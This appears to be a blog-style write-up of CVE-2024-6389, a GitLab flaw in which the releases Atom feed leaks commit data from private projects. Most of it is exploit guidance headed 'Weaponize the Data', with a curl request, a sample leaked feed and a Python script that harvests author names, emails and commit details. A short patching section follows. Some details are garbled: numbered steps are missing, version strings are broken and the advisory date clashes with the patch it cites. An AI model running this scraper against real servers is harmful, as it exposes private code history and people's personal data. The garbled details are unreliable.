CVE-2024-6389 - GitLab Guest User Information Leak via Release Atom Feed – Full Details & Exploit Guidance
Recently, a critical vulnerability—CVE-2024-6389—was uncovered in GitLab Community Edition (CE) and Enterprise Edition (EE). This issue allows a guest user to access commit information from private projects using the “release Atom” feed, even though they do not have appropriate permissions. In this post, we’ll cover what happened, what’s impacted, and show you a direct example of how attackers could abuse this flaw, along with guidance for protecting your projects.
What is CVE-2024-6389?
CVE-2024-6389 is an access control vulnerability in GitLab’s release Atom feed endpoint. The bug affects:
All 17.3 releases before 17.3.2
GitLab’s official advisory:
https://about.gitlab.com/releases/2024/07/10/security-release-17-1-7-17-2-5-17-3-2/
Real-World Impact
A project marked as private is supposed to restrict sensitive info—like commit history—from everyone except explicit team members. This bug allowed even *guest users* (sometimes even anonymous visitors depending on configuration) to read commit data via the API or web interface.
How? The /releases.atom feed endpoint failed to properly enforce access permissions.
Guess or find a private repository’s path on a GitLab server. For example
https://gitlab.example.com/my-company/top-secret-repo
Step 2: Guest User Access
Log in as a guest on the GitLab server (or just try as an anonymous user, depending on configuration).
Replace the project path in the following endpoint
https://gitlab.example.com/my-company/top-secret-repo/-/releases.atom
Step 4: See the Unauthorized Commit Info
Instead of returning a “403 Forbidden,” the server will (in vulnerable versions) send back an Atom XML feed containing commit messages, author names, emails, and commit hashes.
Example: Atom Feed Response
<?xml version="1." encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">;
<title>Releases · my-company/top-secret-repo · GitLab</title>
<entry>
<title>v1..</title>
<author>
<name>Alice Developer</name>
<email>alice@example.com</email>
</author>
<content>
Release notes: Initial release!
Commit: 62b3fbb...
</content>
...
</entry>
<!-- More entries -->
</feed>
Step 5: Weaponize the Data
The attacker can simply fetch the Atom endpoint with a tool like curl or using any web browser. Here’s an example with curl:
curl https://gitlab.example.com/my-company/top-secret-repo/-/releases.atom
No authentication is needed! You’ll receive the Atom feed with all commit data about each release.
Here’s a Python snippet for automating the process and extracting all commit hashes and authors
import requests
from bs4 import BeautifulSoup
url = "https://gitlab.example.com/my-company/top-secret-repo/-/releases.atom"
response = requests.get(url)
if response.ok:
soup = BeautifulSoup(response.content, 'xml')
for entry in soup.find_all('entry'):
title = entry.find('title').text
author = entry.find('author').find('name').text
email = entry.find('author').find('email').text
content = entry.find('content').text
print(f"Release: {title}")
print(f"Author: {author} <{email}>")
print(f"Details: {content}")
print('-' * 60)
else:
print("Could not access Atom feed. Maybe already patched.")
Mitigation & Fix
GitLab has issued patch releases to close this vulnerability. Upgrade immediately if you’re running affected versions:
17.3.2 or later (for 17.3 series)
Official upgrade instructions here.
If you can’t upgrade right away, it’s recommended to firewall off external access to any private projects.
Original References
- GitLab Security Release Advisory
- CVE Details page (pending)
Conclusion
CVE-2024-6389 is a stark reminder that even mature platforms like GitLab can ship with critical permission flaws. Anyone running an affected version should prioritize deploying the patches. Attackers don’t need any deep skills—just a project path and a browser. Don’t wait: review your exposure and update GitLab today.
For questions, check the GitLab issue tracker or their security contact process. Stay safe!
Timeline
Published on: 09/12/2024 17:15:05 UTC
Last modified on: 09/14/2024 15:10:39 UTC